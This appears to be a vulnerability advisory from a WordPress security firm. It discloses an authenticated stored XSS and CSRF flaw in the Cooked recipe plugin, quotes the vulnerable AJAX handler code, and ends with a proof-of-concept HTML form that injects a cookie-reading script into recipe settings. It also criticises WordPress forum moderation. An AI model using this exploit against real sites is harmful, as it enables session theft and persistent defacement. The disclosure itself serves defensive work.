Several days ago we had what looked to be a hacker probing for usage of a commercial WordPress plugin, Cooked Pro, on one of our websites, by the requesting the following file:

/wp-content/plugins/cooked-pro/modules/dropzone/dropzone.min.css

The only publicly disclosed claimed vulnerability in that plugin was a reflected cross-site (XSS) vulnerability, which isn’t something you would expect hackers to be interested in targeting. We don’t have access to the plugin to review if there is a more serious vulnerability that currently exists in the plugin. There is a related free plugin available in the WordPress Plugin Directory, Cooked, so we did a quick check of that. We found it contains an authenticated persistent cross-site scripting (XSS) vulnerability, though one that doesn’t seem like a likely target of hackers. It isn’t clear how much overlap there is the code base of that and Cooked Pro, but it is possible the vulnerability also exists in Cooked Pro.

Based on the insecurity we saw, there may additional vulnerabilities in the plugin, so we would recommend not using Cooked unless its security has been more thoroughly reviewed.

We tested and confirmed that our new firewall plugin for WordPress protected against the exploitation of this vulnerability even before we discovered the vulnerability, as part of its protection against zero-day vulnerabilities.

Authenticated Persistent Cross-Site Scripting (XSS)

The plugin registers the function save_default_bulk() to be accessible through WordPress’ AJAX functionality to anyone logged in to WordPress:

32

add_action( 'wp_ajax_cooked_save_default_bulk', array(&$this,'save_default_bulk') );

That function first checks if the requestor has the edit_cooked_recipes capability:

41
42
43
44
45
46
47

public function save_default_bulk(){
 
	$bulk_amount = 5;
 
	if ( !current_user_can('edit_cooked_recipes') ):
		wp_die();
	endif;

The plugin provides that capability to Contributor and above roles (as well as a new role):

59
60
61
62
63

$wp_roles->add_cap( 'cooked_recipe_editor', 'edit_cooked_recipes' );
$wp_roles->add_cap( 'contributor', 'edit_cooked_recipes' );
$wp_roles->add_cap( 'author', 'edit_cooked_recipes' );
$wp_roles->add_cap( 'editor', 'edit_cooked_recipes' );
$wp_roles->add_cap( 'administrator', 'edit_cooked_recipes' );

The function, which is located in the file /includes/class.cooked-ajax.php, then updates a post meta field for posts specified by the POST input “recipe_ids” with content from the POST input “default_content”:

48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

	if ( isset($_POST['recipe_ids']) ):
 
		$recipe_ids = json_decode( $_POST['recipe_ids'], true );
		$leftover_recipe_ids = array_slice( $recipe_ids, $bulk_amount );
		$recipe_ids = array_slice( $recipe_ids, 0, $bulk_amount );
 
		if ( empty($recipe_ids) ):
			echo 'false';
			wp_die();
		else:
 
			foreach( $recipe_ids as $rid ):
				$recipe_settings = get_post_meta( $rid, '_recipe_settings', true );
				if ( !empty( $recipe_settings ) ):
					$recipe_settings['content'] = $_POST['default_content'];
					update_post_meta( $rid, '_recipe_settings', $recipe_settings );

The relevant values for POST input “recipes_ids” can be found through another AJAX accessible function get_recipe_ids() in the same file.

There isn’t any sanitization or validation of the POST input “default_content” and as the proof of concept below confirms, the value isn’t escaped when output, so cross-site scripting (XSS) can occur.

Do a lack of a nonce check, the vulnerability could also be exploited through cross-site request (CSRF).

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

Hopefully, the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

If the moderation is cleaned up, it would also allow the possibility of being able to use the forum to start discussing fixing the problems caused by the very problematic handling of security by the team running the Plugin Directory, discussions which they have for years shut down through their control of the Support Forum.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that. Other data providers often fail to really determine if the vulnerability has been fixed.

Proof of Concept

The following proof of concept will cause an alert box with any available cookies to be shown on the plugin’s recipes pages, when logged in as a Contributor.

Replace “[path to WordPress]” with the location of WordPress and “[recipe ids]” with the value output from /wp-admin/admin-ajax.php?action=cooked_get_recipe_ids.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=cooked_save_default_bulk" method="POST">
<input type="hidden" name="recipe_ids" value=[recipe ids] />
<input type="hidden" name="default_content" value='<script>alert(document.cookie);</script>"' />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?